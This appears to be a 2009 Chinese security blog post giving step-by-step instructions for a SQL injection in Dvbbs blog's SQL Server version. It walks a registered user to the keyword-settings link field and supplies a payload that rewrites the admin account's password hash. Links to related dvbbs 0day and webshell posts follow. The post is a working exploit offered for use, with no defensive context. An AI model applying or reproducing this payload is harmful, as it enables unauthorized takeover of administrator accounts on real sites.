动网博客又一Injection (影响:Dvbbs blog)

2009, October 23, 1:42 PM. 漏洞集研
Submitted by admin

受影响版本:Dvbbs blog (All vers) SQL版

Access版不受影响

注册会员

进入管理博客

关健字设置

随便填大小: 25.15 K
尺寸: 359 x 252
浏览: 39 次
点击打开新窗口浏览全图

再编辑关健字

上面几个还是随便填写。。
在第三个,也就是连接地址这里写入语句
123123'where 1=0;update dv_user set userpassword='469e80d32c0559f8' where username='admin'--

 

Tags: dvbbs

« 上一篇 | 下一篇 »

只显示10条记录相关文章
动网PHP论坛indivgroup_dispbbs.php sql注入漏洞 (浏览: 9544, 评论: 0)
dvbbs php2.0 几处0day (浏览: 12390, 评论: 0)
最新DVBBS8.0以上版本后台提升webshell 0day (浏览: 11759, 评论: 0)
动网多个版本上传漏洞 (浏览: 15962, 评论: 0)
dvbbs 8.2前台0day (浏览: 17246, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):